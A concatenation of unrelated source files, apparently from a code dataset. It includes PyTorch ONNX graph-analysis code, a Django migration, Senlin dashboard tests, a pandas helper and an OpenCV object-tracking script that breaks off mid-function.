keys = module_list.keys()
for key in keys:
if module_list[key] is target:
return [target._get_name(), str(key)]
if isinstance(module_list[key], (nn.ModuleList, nn.ModuleDict)):
return [module_list[key]._get_name(), str(key)] + _find_module_list(
module_list[key], target
)
return None
def _get_object_to_name_dict(model):
to_name_dict = {}
stack = []
stack.append([model, "self"])
while len(stack) != 0:
obj, name = stack.pop()
if isinstance(obj, nn.Module):
to_name_dict[id(obj)] = name
for key in obj._modules.keys():
stack.append([obj._modules[key], name + "." + key])
return to_name_dict
class scope_name_workaround(object):
def __init__(self, model):
self.backup = None
self.to_name_dict = _get_object_to_name_dict(model)
self.scope_stack = []
def __enter__(self):
def _tracing_name(self_, tracing_state):
if not tracing_state._traced_module_stack:
return None
module = tracing_state._traced_module_stack[-1]
for name, child in module.named_children():
if child is self_:
return name
if isinstance(child, (nn.ModuleList, nn.ModuleDict)):
search_result = _find_module_list(child, self_)
if search_result is not None:
search_result = [child._get_name(), name] + search_result
return search_result
return None
def _slow_forward(self_, *input, **kwargs):
tracing_state = torch._C._get_tracing_state()
if not tracing_state or isinstance(self_.forward, torch._C.ScriptMethod):
return self_.forward(*input, **kwargs)
if tracing_state.current_scope() != "":
self.scope_stack.append(tracing_state.current_scope())
tracing_state.pop_scope()
if id(self_) in self.to_name_dict:
tracing_state.push_scope(self.to_name_dict[id(self_)])
try:
result = self_.forward(*input, **kwargs)
finally:
if tracing_state.current_scope() != "":
tracing_state.pop_scope()
if len(self.scope_stack) != 0:
tracing_state.push_scope(self.scope_stack[-1])
self.scope_stack.pop()
return result
self.backup = torch.nn.Module._slow_forward
setattr(torch.nn.Module, "_slow_forward", _slow_forward)
def __exit__(self, type, value, tb):
setattr(torch.nn.Module, "_slow_forward", self.backup)
# DataNode
class DataNode(object):
def __init__(self, node):
# basic info
self.name = "self." + node.debugName()
self._type = None
self._size = None
self.kind = str(node.type().kind())
if self.kind == "TensorType" or self.kind == "CompleteTensorType":
sizes = node.type().sizes()
if sizes is not None:
self._size = list(sizes)
self._type = str(node.type().scalarType())
self._is_terminal = False
self._is_input = False
self._is_output = False
# operator related
self.in_operator: operator.OperatorNode = None
self.out_operators: List[operator.OperatorNode] = []
# data add with the hook
self.data = None
# add a key value changeable
self._changeable = True
# set the graph
self.graph: ONNXGraph = None
def get(self, indexs, dim):
dict_tuple = []
for _ in range(0, dim):
dict_tuple.append(slice(None, None, None))
dict_tuple.append(indexs)
return self.data[tuple(dict_tuple)]
def __str__(self):
return_str = "%" + self.name + ": "
if self._type is None:
return return_str + "Unknown()"
return_str += self._type
return_str += "("
if len(self._size) == 0:
return_str += ")"
return return_str
for s in self._size:
return_str += str(s)
return_str += ", "
return_str = return_str[:-2]
return_str += ")"
return return_str
def __repr__(self):
return self.__str__()
def is_terminal(self):
return self._is_terminal
def is_input(self):
return self._is_input
def is_output(self):
return self._is_output
def is_changeable(self):
return self._changeable
def size(self, dim=None):
if dim is None:
return self._size
if dim >= len(self._size):
raise RuntimeError("the dim out of index")
return self._size[dim]
def type(self):
return self._type
def __len__(self):
if self._size is None:
return 0
else:
if len(self._size) == 0:
return 0
return self._size[0]
def cut_analysis(self, index, dim):
mask = mask_utils.Mask(self._size)
if not isinstance(index, (list, np.ndarray)):
raise RuntimeError("The index must be a list or a ndarray")
mask.set_mask([index], [dim])
return self.cut_analysis_with_mask(mask)
def cut_analysis_with_mask(self, mask):
times = 0
mask_dict = OrderedDict()
mask_dict[self.name] = mask
operator_dict = OrderedDict()
stack = []
stack.append((self, mask, None))
while len(stack) != 0:
node, mask, push_operator = stack.pop()
operators = node.out_operators
operators = operators[:]
if node.in_operator is not None:
operators.append(node.in_operator)
# remove the push_opeartion
if push_operator is not None:
for i in range(0, len(operators)):
if id(operators[i]) == id(push_operator):
del operators[i]
break
# run analysis for operator
for operator in operators:
return_masks, operator_params = operator.analysis(node, mask)
# handle operator_dict
if operator_params is not None:
if operator.name not in operator_dict:
operator_dict[operator.name] = [operator_params]
else:
operator_dict[operator.name].append(operator_params)
# handle return_dict
for name in return_masks.keys():
return_node = self.graph.nodes[name]
if name in mask_dict.keys():
if mask_dict[name].include(return_masks[name]):
continue
mask_dict[name] = mask_utils.combine_mask(
[mask_dict[name], return_masks[name]]
)
else:
mask_dict[name] = return_masks[name]
# push stack
stack.append((return_node, return_masks[name].copy(), operator))
times += 1
if times >= max_search_time:
raise RuntimeError("max search time exceed")
conbine_dict = {}
conbine_dict["terminal"] = {}
conbine_dict["iner"] = {}
conbine_dict["operator"] = {}
for key in mask_dict.keys():
node = self.graph.nodes[key]
result = mask_dict[key].indexs()
if not node.is_terminal():
conbine_dict["iner"][key] = result
else:
conbine_dict["terminal"][key] = result
for key in operator_dict.keys():
conbine_dict["operator"][key] = _operator_params_combine(operator_dict[key])
return conbine_dict
# the module class
class Module(object):
def __init__(self):
self.name = ""
self.sub_modules: Dict[str, Module] = OrderedDict() # store the sub modules
self.in_data: List[DataNode] = [] # the data may be used different times
self.out_data: List[DataNode] = [] # the data may produced different times
self.operators: List[
operator.OperatorNode
] = [] # save the opeartor in current module
self.nn_object: nn.Module = None # bounding the actual object
self.terminal_node: DataNode = None
def cut_analysis(self, attribute_name, index, dim):
attrs = attribute_name.split(".")
current_module = self
for attr in attrs:
if attr in current_module.sub_modules:
current_module = current_module.sub_modules[attr]
else:
raise RuntimeError("Can not find attribute " + str(attribute_name))
if current_module.terminal_node is None:
raise RuntimeError("The target attribute is not cuttable")
return current_module.terminal_node.cut_analysis(index, dim)
def __str__(self):
return_string = ""
class_string = str(self.nn_object.__class__)[8:-2]
return_string += class_string
return_string += "["
if self.terminal_node is not None:
return_string += "self."
terminal_string = str(getattr(self, "terminal_node"))[1:]
split_string = terminal_string.split(":")
return_string += split_string[0]
return_string += "]:"
return_string += split_string[1][1:]
else:
return_string += self.name
return_string += "]"
return return_string
def __repr__(self):
return self.__str__()
class ONNXGraph(object):
def __init__(self, model, onnx_device="CPU"):
if isinstance(
model, (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
):
print(
"WARNING: The model is warped with the DataParallel, the Graph object just binding the model.module part"
)
self._model: nn.Module = model.module
else:
self._model: nn.Module = model
self.modules: Dict[str, Module] = OrderedDict()
self.inputs: Dict[str, DataNode] = OrderedDict()
self.nodes: Dict[str, DataNode] = OrderedDict()
self.outputs: Dict[str, DataNode] = OrderedDict()
self.operators: Dict[str, operator.OperatorNode] = OrderedDict()
self._device: str = onnx_device
def __str__(self):
out_string = ""
for node in self.nodes.keys():
out_string += str(self.nodes[node])
out_string += "\n"
for operator in self.operators.keys():
out_string += str(self.operators[operator])
out_string += "\n"
return out_string
def forward(self, inputs):
# change the inputs
if len(self.inputs.keys()) != len(inputs):
raise RuntimeError(
"The inputs numbers is wrong expected "
+ str(self.inputs.keys())
+ " but got "
+ str(len(inputs))
)
input_keys = list(self.inputs.keys())
for i in range(0, len(inputs)):
if list(inputs[i].size()) != list(self.inputs[input_keys[i]].size()):
raise RuntimeError(
"The inputs must as the same size as the origin input"
)
self.inputs[input_keys[i]].data = inputs[i].numpy()
for operator in self.operators:
self.operators[operator].fill_shape()
self.operators[operator].fill_value()
def set_device(self, device):
self._device = device
for operator in self.operators:
self.operators[operator].set_device(device)
def get_device(self):
return self._device
def flops(self):
total_flops = 0
for operator in self.operators:
total_flops += self.operators[operator].flops()
return total_flops / 1000000
def get_module_by_object(self, obj):
for module_name in self.modules:
c_module = self.modules[module_name]
if id(c_module.nn_object) == id(obj):
return c_module
return None
def build_graph(self, inputs, fill_value=True, training=False):
# prepare the data structure
data_node_dict: Dict[str, DataNode] = OrderedDict()
# input node dict
input_node_dict: Dict[str, DataNode] = OrderedDict()
# terminal_node_dict
terminal_node_dict: Dict[str, DataNode] = OrderedDict()
# output node dict
output_node_dict: Dict[str, DataNode] = OrderedDict()
# operator list
operator_dict: Dict[str, DataNode] = OrderedDict()
# module dict
module_dict: Dict[str, Module] = OrderedDict()
# check the function_module
if function_module.function_module_activate() and not hasattr(
self._model, "_init_function_module_ok"
):
raise RuntimeError("Call the init_function_module in function_module mode")
# deep copy the model
model = copy.deepcopy(self._model)
model = model.cpu()
# preprocess the quantization node
for module in model.modules():
if isinstance(module, torch.quantization.FakeQuantize):
module.calculate_qparams()
model.apply(torch.quantization.disable_observer)
with scope_name_workaround(model):
torch.onnx.symbolic_helper._set_opset_version(11)
graph, params_dict, torch_out = torch.onnx.utils._model_to_graph(
model,
inputs,
_retain_param_name=True,
do_constant_folding=False,
training=training,
)
torch.onnx.symbolic_helper._set_opset_version(9)
# create the inputs and the terminals
inputs_number = len(inputs)
input_nodes = list(graph.inputs())
total_number = len(input_nodes)
for i in range(0, total_number):
data_node = DataNode(input_nodes[i])
if i < inputs_number:
data_node._is_input = True
data_node._changeable = False
data_node.data = inputs[i].numpy()
input_node_dict[data_node.name] = data_node
else:
data_node._is_terminal = True
data_node.data = params_dict[
".".join(data_node.name.split(".")[1:])
].numpy()
terminal_node_dict[data_node.name] = data_node
data_node_dict[data_node.name] = data_node
# create the iner node and the operator node
body_nodes = list(graph.nodes())
for i in range(0, len(body_nodes)):
# create the operator node
node = body_nodes[i]
operator_node = create_operator(node)
operator_node.set_device(self._device)
# create the outputs node
outputs = list(node.outputs())
for out_node in outputs:
data_node = DataNode(out_node)
data_node.in_operator = operator_node
data_node_dict[data_node.name] = data_node
operator_node.out_data.append(data_node)
# link the inputs node
inputs = list(node.inputs())
for in_node in inputs:
in_node_name = "self." + in_node.debugName()
data_node = data_node_dict[in_node_name]
operator_node.in_data.append(data_node)
data_node.out_operators.append(operator_node)
operator_dict[str(i)] = operator_node
# if the data node is the output, set the changeable to be false, set the is output to be true
outputs = list(node.outputs())
for out_node in outputs:
out_node_name = "self." + out_node.debugName()
data_node = data_node_dict[out_node_name]
data_node._changeable = False
data_node._is_output = True
output_node_dict[out_node_name] = data_node
# binding the graph to node
for key in data_node_dict.keys():
data_node_dict[key].graph = self
# create the module
for key in operator_dict:
operator = operator_dict[key]
obj_list = operator.obj_list
current = ""
parent = None
for i in range(0, len(obj_list)):
name = obj_list[i]
if current == "":
current = name
else:
current = current + "." + name
actual_obj = get_object(self._model, current)
if current not in module_dict.keys():
module_dict[current] = Module()
module_dict[current].name = current
module_dict[current].graph = graph
module_dict[current].nn_object = actual_obj
if parent is not None:
parent.sub_modules[name] = module_dict[current]
parent = module_dict[current]
if i == len(obj_list) - 1:
module_dict[current].operators.append(operator)
# add the terminal node
for node_name in terminal_node_dict.keys():
node = terminal_node_dict[node_name]
obj_names = node_name.split(".")
if len(obj_names) == 2 and intable(obj_names[1]):
continue
current = "self"
parent = None
for i in range(1, len(obj_names)):
name = obj_names[i]
current = current + "." + name
actual_obj = get_object(self._model, current)
if current not in module_dict.keys():
if i == len(obj_names) - 1:
if not isinstance(actual_obj, (nn.Parameter, torch.Tensor)):
raise RuntimeError(
"The terminal node must be the nn.Parameter or torch.Tensor"
)
module_dict[current] = Module()
module_dict[current].terminal_node = node
module_dict[current].name = current
module_dict[current].graph = graph
module_dict[current].nn_object = actual_obj
module_dict[current].nn_type = type(actual_obj)
if parent is not None:
parent.sub_modules[name] = module_dict[current]
parent = module_dict[current]
# bind the in_data and out_data for modules
for node_name in data_node_dict.keys():
node = data_node_dict[node_name]
if node.is_terminal() and not node.is_input():
continue
if node.is_input():
out_operators = node.out_operators
for operator in out_operators:
obj_names = operator.obj_list[1:]
prefix = "self"
modules_list = _get_all_modules(module_dict, prefix, obj_names)
for module in modules_list:
if node not in module.in_data:
module.in_data.append(node)
continue
in_operator = node.in_operator
in_scope = in_operator.obj_list
out_operators = node.out_operators[:]
if not node.is_output() and len(out_operators) == 0:
module_name = _cat_names(in_operator.obj_list)
module_dict[module_name].out_data.append(node)
continue
output_scope_list = []
for out_operator in out_operators:
output_scope_list.append(out_operator.obj_list)
if node.is_output:
output_scope_list.append(["self"])
for scope in output_scope_list:
prefix, in_scope_names, out_scope_names = _get_common(in_scope, scope)
in_modules_list = _get_all_modules(module_dict, prefix, in_scope_names)
for module in in_modules_list:
if node not in module.out_data:
module.out_data.append(node)
out_modules_list = _get_all_modules(
module_dict, prefix, out_scope_names
)
for module in out_modules_list:
if node not in module.in_data:
module.in_data.append(node)
self.nodes = data_node_dict
self.inputs = input_node_dict
self.outputs = output_node_dict
self.modules = module_dict
self.operators = operator_dict
# fille the data and value
if fill_value:
for operator in operator_dict:
operator_dict[operator].fill_shape()
operator_dict[operator].fill_value()
else:
for operator in operator_dict:
operator_dict[operator].fill_shape()
self.nodes = data_node_dict
self.inputs = input_node_dict
self.outputs = output_node_dict
self.modules = module_dict
self.operators = operator_dict
| StarcoderdataPython |
6413377 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-29 06:03
import django.contrib.postgres.fields.jsonb
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("blog", "0003_auto_20170926_0641")]
operations = [
migrations.AddField(
model_name="blogmark",
name="metadata",
field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
preserve_default=False,
),
migrations.AddField(
model_name="entry",
name="metadata",
field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
preserve_default=False,
),
migrations.AddField(
model_name="quotation",
name="metadata",
field=django.contrib.postgres.fields.jsonb.JSONField(default={}),
preserve_default=False,
),
]
| StarcoderdataPython |
3457718 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import yaml
from django.urls import reverse
from senlin_dashboard import api
from senlin_dashboard.test import helpers as test
INDEX_URL = reverse('horizon:cluster:policies:index')
CREATE_URL = reverse('horizon:cluster:policies:create')
DETAIL_URL = reverse('horizon:cluster:policies:detail', args=[u'1'])
class PoliciesTest(test.TestCase):
@test.create_mocks({api.senlin: ('policy_list',)})
def test_index(self):
policies = self.policies.list()
self.mock_policy_list.return_value = policies
res = self.client.get(INDEX_URL)
self.assertContains(res, '<h1>Policies</h1>')
self.assertTemplateUsed(res, 'cluster/policies/index.html')
self.assertEqual(2, len(policies))
self.mock_policy_list.assert_called_once_with(
test.IsHttpRequest(), filters={}, marker=None,
paginate=True, reversed_order=False)
@test.create_mocks({api.senlin: ('policy_list',)})
def test_index_policy_list_exception(self):
self.mock_policy_list.side_effect = (
self.exceptions.senlin)
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'cluster/policies/index.html')
self.assertEqual(0, len(res.context['policies_table'].data))
self.assertMessageCount(res, error=1)
self.mock_policy_list.assert_called_once_with(
test.IsHttpRequest(), filters={}, marker=None,
paginate=True, reversed_order=False)
@test.create_mocks({api.senlin: ('policy_list',)})
def test_index_no_policy(self):
self.mock_policy_list.return_value = []
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'cluster/policies/index.html')
self.assertContains(res, 'No items to display')
self.assertEqual(0, len(res.context['policies_table'].data))
self.mock_policy_list.assert_called_once_with(
test.IsHttpRequest(), filters={}, marker=None,
paginate=True, reversed_order=False)
@test.create_mocks({api.senlin: ('policy_create',)})
def test_create_policy(self):
spec_yaml = """
type: senlin.policy.deletion
version: 1.0
description: A policy.
properties:
criteria: OLDEST_FIRST
destroy_after_deletion: True
grace_period: 60
reduce_desired_capacity: False
"""
formdata = {
'name': 'test-policy',
'spec': yaml.safe_load(spec_yaml),
'cooldown': 0,
'level': 0
}
args = {
'name': 'test-policy',
'spec': yaml.safe_load(spec_yaml),
'cooldown': 0,
'level': 0
}
self.mock_policy_create.return_value = args
res = self.client.post(CREATE_URL, formdata)
self.assertNoFormErrors(res)
@test.create_mocks({api.senlin: ('policy_get',)})
def test_policy_detail(self):
policy = self.policies.list()[0]
self.mock_policy_get.return_value = policy
res = self.client.get(DETAIL_URL)
self.assertTemplateUsed(res, 'horizon/common/_detail.html')
self.assertContains(res, 'test-policy')
self.mock_policy_get.assert_called_once_with(
test.IsHttpRequest(), u'1')
| StarcoderdataPython |
397878 | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 14 10:05:36 2017
@author: jel2
"""
import pandas as pd
#### this version resets the index of X in the returned table
def getSubtable(X,dictColumn='DETAILS'):
X=X.reset_index()
t=list(X)
t.remove(dictColumn)
return(X[t].join(pd.DataFrame.from_records(X.DETAILS.tolist(),index=X.index)))
| StarcoderdataPython |
1712286 | <reponame>sieniven/spot-it-3d
import cv2
import math
import numpy as np
import time
import queue
from camera_stabilizer import stabilize_frame
from camera_stabilizer import Camera
from filterpy.kalman import KalmanFilter
from filterpy.common import Q_discrete_white_noise
from scipy.spatial import distance
from scipy.optimize import linear_sum_assignment
from automatic_brightness import average_brightness
from object_tracker import imopen
class Track:
def __init__(self, track_id, size):
self.id = track_id
self.size = size
# Constant Velocity Model
self.kalmanFilter = KalmanFilter(dim_x=4, dim_z=2)
# # Constant Acceleration Model
# self.kalmanFilter = KalmanFilter(dim_x=6, dim_z=2)
self.age = 1
self.totalVisibleCount = 1
self.consecutiveInvisibleCount = 0
# Dilates the image multiple times to get of noise in order to get a single large contour for each background object
# Identify background objects by their shape (non-circular)
# Creates a copy of the input image which has the background contour filled in
# Returns the filled image which has the background elements filled in
def remove_ground(im_in, dilation_iterations, background_contour_circularity, frame):
kernel_dilation = np.ones((5, 5), np.uint8)
# Number of iterations determines how close objects need to be to be considered background
dilated = cv2.dilate(im_in, kernel_dilation, iterations=dilation_iterations)
imshow_resized('dilated', dilated)
contours, hierarchy = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
background_contours = []
for contour in contours:
# Identify background from foreground by the circularity of their dilated contours
circularity = 4 * math.pi * cv2.contourArea(contour) / (cv2.arcLength(contour, True) ** 2)
if circularity <= background_contour_circularity:
background_contours.append(contour)
# This bit is used to find a suitable level of dilation to remove background objects
# while keeping objects to be detected
# im_debug = cv2.cvtColor(im_in.copy(), cv2.COLOR_GRAY2BGR)
im_debug = frame.copy()
cv2.drawContours(im_debug, background_contours, -1, (0, 255, 0), 3)
imshow_resized('to_be_removed', im_debug)
im_out = im_in.copy()
cv2.drawContours(im_out, background_contours, -1, 0, -1)
return im_out
def imshow_resized(window_name, img):
aspect_ratio = img.shape[1] / img.shape[0]
window_size = (int(600), int(600 / aspect_ratio))
img = cv2.resize(img, window_size, interpolation=cv2.INTER_CUBIC)
cv2.imshow(window_name, img)
def downsample_image(img):
aspect_ratio = img.shape[1] / img.shape[0]
img_size = (int(1920), int(1920 / aspect_ratio))
img = cv2.resize(img, img_size, interpolation=cv2.INTER_CUBIC)
return img
def track_objects_realtime(filename):
if filename == 0:
realtime = True
print('Start Video Capture')
else:
realtime = False
cap = cv2.VideoCapture(filename)
global FPS, FRAME_WIDTH, FRAME_HEIGHT, SCALE_FACTOR
FPS = int(cap.get(cv2.CAP_PROP_FPS))
FRAME_WIDTH = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
FRAME_HEIGHT = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
SCALE_FACTOR = math.sqrt(FRAME_WIDTH ** 2 + FRAME_HEIGHT ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
aspect_ratio = FRAME_WIDTH / FRAME_HEIGHT
downsample = False
if FRAME_WIDTH * FRAME_HEIGHT > 1920 * 1080:
downsample = True
FRAME_WIDTH = 1920
FRAME_HEIGHT = int(1920 / aspect_ratio)
SCALE_FACTOR = math.sqrt(FRAME_WIDTH ** 2 + FRAME_HEIGHT ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
# recording = cv2.VideoWriter('recording.mp4', cv2.VideoWriter_fourcc(*'h264'),
# FPS, (FRAME_WIDTH, FRAME_HEIGHT))
out_combined = cv2.VideoWriter('out_real-time.mp4', cv2.VideoWriter_fourcc(*'h264'),
FPS, (FRAME_WIDTH, FRAME_HEIGHT * 2))
camera = Camera((FRAME_WIDTH, FRAME_HEIGHT))
fgbg, detector = setup_system_objects()
next_id = 0
tracks = []
frame = None
frame_before = None
frame_count = 0
fps_log = []
frame_start = time.time()
origin = np.array([0, 0])
consecutive_dropped_frames = 0
max_tolerated_consecutive_dropped_frames = 5
while cap.isOpened():
if realtime:
frame_end = time.time()
frame_time = frame_end - frame_start
if frame_time > 0.001:
fps_log.append(frame_time)
if len(fps_log) > 5:
FPS = 1 / (sum(fps_log) / len(fps_log))
fps_log.pop(0)
ret, frame = cap.read()
frame_start = time.time()
if ret:
print(frame_count)
if downsample:
frame = downsample_image(frame)
# frame, mask = camera.undistort(frame)
mask = np.ones((FRAME_HEIGHT, FRAME_WIDTH), dtype=np.uint8) * 255
if frame_count == 0:
frame_before = frame
elif frame_count >= 1:
# Frame stabilization
stabilized_frame, dx, dy = stabilize_frame(frame_before, frame)
origin[0] -= int(dx)
origin[1] -= int(dy)
frame_before = frame
frame = stabilized_frame
calibration_time = time.time()
# centroids_f, sizes_f, masked = detect_objects(frame, mask, fgbg, detector, origin) # Detect the far & small objects
# centroids = centroids_f
# sizes = sizes_f
centroids_n, sizes_n, masked = detect_objects_large(frame, mask, fgbg, detector,
origin) # Detect the near & big objects
# centroids = np.append(centroids, centroids_n)
# sizes = np.append(sizes, sizes_n)
centroids = centroids_n
sizes = sizes_n
detection_time = time.time()
else: # Failed to read file
if consecutive_dropped_frames >= max_tolerated_consecutive_dropped_frames:
break
else:
consecutive_dropped_frames += 1
# There is no frame, so we make do with the previous frame for visualization
# We still want it as a 3 channel image but in gray
frame = cv2.cvtColor(cv2.cvtColor(frame_before, cv2.COLOR_BGR2GRAY), cv2.COLOR_GRAY2BGR)
# Empty array as the masked image
masked = np.zeros((FRAME_HEIGHT, FRAME_WIDTH), dtype=np.uint8)
# Empty data for detections
centroids = np.zeros((0, 2))
sizes = np.zeros(0)
predict_new_locations_of_tracks(tracks)
prediction_time = time.time()
assignments, unassigned_tracks, unassigned_detections \
= detection_to_track_assignment(tracks, centroids, 10 * SCALE_FACTOR)
assignment_time = time.time()
update_assigned_tracks(assignments, tracks, centroids, sizes)
update_unassigned_tracks(unassigned_tracks, tracks)
tracks = delete_lost_tracks(tracks)
next_id = create_new_tracks(unassigned_detections, next_id, tracks, centroids, sizes)
return_frame = frame.copy()
masked = cv2.cvtColor(masked, cv2.COLOR_GRAY2BGR)
good_tracks = filter_tracks(frame, masked, tracks, frame_count, origin)
other_track_stuff = time.time()
# recording.write(return_frame)
frame_out = np.zeros((FRAME_HEIGHT * 2, FRAME_WIDTH, 3), dtype=np.uint8)
frame_out[0:FRAME_HEIGHT, 0:FRAME_WIDTH] = frame
frame_out[FRAME_HEIGHT:FRAME_HEIGHT * 2, 0:FRAME_WIDTH] = masked
out_combined.write(frame_out)
imshow_resized('frame', frame)
imshow_resized('masked', masked)
display_time = time.time()
print(f"The frame took {(display_time - frame_start) * 1000}ms in total.\n"
f"Camera stabilization took {(calibration_time - frame_start) * 1000}ms.\n"
f"Object detection took {(detection_time - calibration_time) * 1000}ms.\n"
f"Prediction took {(prediction_time - detection_time) * 1000}ms.\n"
f"Assignment took {(assignment_time - prediction_time) * 1000}ms.\n"
f"Other track stuff took {(other_track_stuff - assignment_time) * 1000}ms.\n"
f"Writing to file took {(display_time - other_track_stuff) * 1000}ms.\n\n")
frame_count += 1
if not realtime:
frame_start = False
yield good_tracks, origin, frame_count, return_frame, frame_start
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
# recording.release()
out_combined.release()
cv2.destroyAllWindows()
# Create VideoCapture object to extract frames from,
# background subtractor object and blob detector objects for object detection
# and VideoWriters for output videos
def setup_system_objects():
# Background subtractor works by subtracting the history from the current frame.
# Further more this model already incldues guassian blur and morphological transformations
# varThreshold affects the spottiness of the image. The lower it is, the more smaller spots.
# The larger it is, these spots will combine into large foreground areas
# fgbg = cv2.createBackgroundSubtractorMOG2(history=int(10*FPS), varThreshold=64*SCALE_FACTOR,
# detectShadows=False)
# A lower varThreshold results in more noise which is beneficial to ground subtraction (but detrimental if you want
# detections closer to the ground as there is more noise
fgbg = cv2.createBackgroundSubtractorMOG2(history=int(5 * FPS), varThreshold=16 / SCALE_FACTOR,
detectShadows=False)
# Background ratio represents the fraction of the history a frame must be present
# to be considered part of the background
# eg. history is 5s, background ratio is 0.1, frames present for 0.5s will be considered background
fgbg.setBackgroundRatio(0.05)
fgbg.setNMixtures(5)
# fgbg = cv2.createBackgroundSubtractorMOG2(detectShadows=False)
params = cv2.SimpleBlobDetector_Params()
# params.filterByArea = True
# params.minArea = 1
# params.maxArea = 1000
params.filterByConvexity = False
params.filterByCircularity = False
detector = cv2.SimpleBlobDetector_create(params)
return fgbg, detector
# Apply image masks to prepare frame for blob detection
# Masks: 1) Increased contrast and brightness to fade out the sky and make objects stand out
# 2) Background subtractor to remove the stationary background (Converts frame to a binary image)
# 3) Further background subtraction by means of contouring around non-circular objects
# 4) Dilation to fill holes in detected drones
# 5) Inversion to make the foreground black for the blob detector to identify foreground objects
# Perform the blob detection on the masked image
# Return detected blob centroids as well as size
def detect_objects(frame, mask, fgbg, detector, origin):
# Adjust contrast and brightness of image to make foreground stand out more
# alpha used to adjust contrast, where alpha < 1 reduces contrast and alpha > 1 increases it
# beta used to increase brightness, scale of (-255 to 255) ? Needs confirmation
# formula is im_out = alpha * im_in + beta
# Therefore to change brightness before contrast, we need to do alpha = 1 first
masked = cv2.convertScaleAbs(frame, alpha=1, beta=0)
gain = 15
masked = cv2.convertScaleAbs(masked, alpha=1, beta=256 - average_brightness(16, frame, mask) + gain)
# masked = cv2.convertScaleAbs(masked, alpha=2, beta=128)
# masked = cv2.cvtColor(masked, cv2.COLOR_BGR2GRAY)
# masked = threshold_rgb(frame)
imshow_resized("pre-background subtraction", masked)
# Subtract Background
# Learning rate affects how often the model is updated
# High values > 0.5 tend to lead to patchy output
# Found that 0.1 - 0.3 is a good range
masked = fgbg.apply(masked, learningRate=-1)
imshow_resized("background subtracted", masked)
masked = remove_ground(masked, int(13 / (2.26 / SCALE_FACTOR)), 0.6, frame)
# Morphological Transforms
# Close to remove black spots
# masked = imclose(masked, 3, 1)
# Open to remove white holes
# masked = imopen(masked, 3, 2)
# masked = imfill(masked)
kernel_dilation = np.ones((5, 5), np.uint8)
masked = cv2.dilate(masked, kernel_dilation, iterations=2)
# Apply foreground mask (dilated) to the image and perform detection on that
# masked = cv2.bitwise_and(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY), masked)
# Invert frame such that black pixels are foreground
masked = cv2.bitwise_not(masked)
# keypoints = []
# Blob detection
keypoints = detector.detect(masked)
n_keypoints = len(keypoints)
centroids = np.zeros((n_keypoints, 2))
sizes = np.zeros((n_keypoints, 2))
for i in range(n_keypoints):
centroids[i] = keypoints[i].pt
centroids[i] += origin
sizes[i] = keypoints[i].size
return centroids, sizes, masked
def detect_objects_large(frame, mask, fgbg, detector, origin):
masked = cv2.convertScaleAbs(frame, alpha=1, beta=0)
gain = 15
masked = cv2.convertScaleAbs(masked, alpha=1, beta=256 - average_brightness(16, frame, mask) + gain)
masked = fgbg.apply(masked, learningRate=-1)
kernel = np.ones((5, 5), np.uint8)
# Remove Noise
masked = cv2.morphologyEx(masked, cv2.MORPH_OPEN, kernel, iterations=int(1))
masked = cv2.dilate(masked, kernel, iterations=int(4 * SCALE_FACTOR))
contours, hierarchy = cv2.findContours(masked, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
n_keypoints = len(contours)
centroids = np.zeros((n_keypoints, 2))
sizes = np.zeros((n_keypoints, 2))
for i, contour in enumerate(contours):
M = cv2.moments(contour)
centroids[i] = [int(M['m10'] / M['m00']), int(M['m01'] / M['m00'])]
centroids[i] += origin
x, y, w, h = cv2.boundingRect(contour)
sizes[i] = (w, h)
return centroids, sizes, masked
def predict_new_locations_of_tracks(tracks):
for track in tracks:
track.kalmanFilter.predict()
# Assigns detections to tracks using Munkre's Algorithm with cost based on euclidean distance,
# with detections being located too far from existing tracks being designated as unassigned detections
# and tracks without any nearby detections being designated as unassigned tracks
def detection_to_track_assignment(tracks, centroids, cost_of_non_assignment):
# start_time = time.time()
m, n = len(tracks), len(centroids)
k, l = min(m, n), max(m, n)
# Create a square 2-D cost matrix with dimensions twice the size of the larger list (detections or tracks)
cost = np.zeros((k + l, k + l))
# initialization_time = time.time()
# Calculate the distance of every detection from each track,
# filling up the rows of the cost matrix (up to column n, the number of detections) corresponding to existing tracks
# This creates a m x n matrix
for i in range(len(tracks)):
start_time_distance_loop = time.time()
track = tracks[i]
track_location = track.kalmanFilter.x[:2]
cost[i, :n] = np.array([distance.euclidean(track_location, centroid) for centroid in centroids])
# distance_time = time.time()
unassigned_track_cost = cost_of_non_assignment
unassigned_detection_cost = cost_of_non_assignment
extra_tracks = 0
extra_detections = 0
if m > n: # More tracks than detections
extra_tracks = m - n
elif n > m: # More detections than tracks
extra_detections = n - m
elif n == m:
pass
# Padding cost matrix with dummy columns to account for unassigned tracks
# This is used to fill the top right corner of the cost matrix
detection_padding = np.ones((m, m)) * unassigned_track_cost
cost[:m, n:] = detection_padding
# Padding cost matrix with dummy rows to account for unassigned detections
# This is used to fill the bottom left corner of the cost matrix
track_padding = np.ones((n, n)) * unassigned_detection_cost
cost[m:, :n] = track_padding
# padding_time = time.time()
# The bottom right corner of the cost matrix, corresponding to dummy detections being matched to dummy tracks
# is left with 0 cost to ensure that excess dummies are always matched to each other
# Perform the assignment, returning the indices of assignments,
# which are combined into a coordinate within the cost matrix
row_ind, col_ind = linear_sum_assignment(cost)
assignments_all = np.column_stack((row_ind, col_ind))
# assignment_time = time.time()
